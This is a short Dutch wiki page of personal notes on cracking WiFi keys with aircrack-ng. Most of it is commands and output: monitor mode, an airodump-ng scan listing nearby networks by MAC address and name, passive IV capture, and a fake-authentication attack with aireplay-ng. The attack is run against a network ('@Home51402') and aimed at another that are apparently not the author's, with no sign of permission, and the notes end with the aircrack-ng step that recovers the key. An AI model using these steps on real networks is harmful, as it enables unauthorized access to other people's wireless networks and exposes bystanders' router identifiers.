!!! Wifi Cracking

Voor alle info zie [Aircrack-ng.org|http://www.aircrack-ng.org/]
\\En de [Linux newbie Guide|http://www.aircrack-ng.org/doku.php?id=newbie_guide]

Starten van de wifi kaart in ''monitor state'' : {{{airmon-ng start eth1}}}

Bekijken wat er langs komt m.b.v. __airodump__ :

{{{
root@bismarck:~# airodump-ng eth1
CH  7 ][ Elapsed: 1 min ][ 2007-09-17 18:40 
                                                                                                             
 BSSID              PWR  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
                                                                                                             
 00:0C:F6:2B:70:C6   -1        3        0    0  11  54. WPA  TKIP   PSK  Sitecom                             
 00:14:7F:B0:5A:E1   -1       11        0    0   1  48  WPA2 CCMP   PSK  SpeedTouchD4CAEA                    
 00:16:0A:0D:EF:EB   -1       18        0    0   6  54  WEP  WEP         DirtyHarryWifi                      
 00:02:6F:09:0A:05   -1       21        0    0   6  11  WEP  WEP         conexant                            
 00:01:E3:55:2F:86   -1       46        0    0   1  54. WPA2 CCMP   PSK  Meyer                               
 00:1A:70:47:A7:57   -1      108        0    0  11  48  WPA2 CCMP   PSK  Fam. Kok                            
 00:18:4D:54:9F:38   -1      190        0    0  11  48  WPA  TKIP   PSK  @Home51402                          
 00:14:7F:B0:67:50   -1       41        3    0   6  48  WPA2 CCMP   PSK  SpeedTouch2E36F8                    
 00:90:96:CF:80:77   -1        3        0    0   9  48  WPA  TKIP   PSK  SpeedTouch8E5F35                    
                                                                                                             
 BSSID              STATION            PWR  Lost  Packets  Probes                                            
                                                                                                             
 00:14:7F:B0:67:50  00:18:F8:B0:1B:34   -1     0        1                                                    
}}}

!! Passive attack

Hierbij ga je heel veel beacons verzamelen van een AP, ze opslaan in een file, en deze weer gebruiken
om de key te achterhalen.
{{{airodump-ng -c 9 --bssid 00:14:7F:B0:67:50 -w output eth1}}}

!! Active attack

Your card must support packet injection !
{{{aireplay-ng -1 0 -e DirtyHarryWifi -a 00:16:0A:0D:EF:EB -h 00:19:D2:83:F3:77 eth1 }}}

Echter, op mijn Centrino chipset is packet injection niet supported:
{{{
root@bismarck:~# aireplay-ng -1 0 -e @Home51402 -a 00:18:4D:54:9F:38 -h 00:19:D2:83:F3:77 eth1
19:03:31  Sending Authentication Request
19:03:33  Sending Authentication Request
19:03:35  Sending Authentication Request
19:03:37  Sending Authentication Request
19:03:39  Sending Authentication Request
19:03:41  Sending Authentication Request
19:03:43  Sending Authentication Request

Attack was unsuccessful. Possible reasons:

    * Perhaps MAC address filtering is enabled.
    * Check that the BSSID (-a option) is correct.
    * The driver hasn't been patched for injection.
    * This attack sometimes fails against some APs.
    * The card is not on the same channel as the AP.
    * Injection is not supported AT ALL on HermesI,
      Centrino, ndiswrapper and a few others chipsets.
    * You're too far from the AP. Get closer, or lower
      the transmit rate (iwconfig <iface> rate 1M).
}}}

!! The real cracking

Als je genoeg packets (IV's, Initialization Vectors) hebt (duizenden), dan kan je aan het "rekenen" :
{{{aircrack-ng -b 00:01:02:03:04:05 dump-01.cap}}}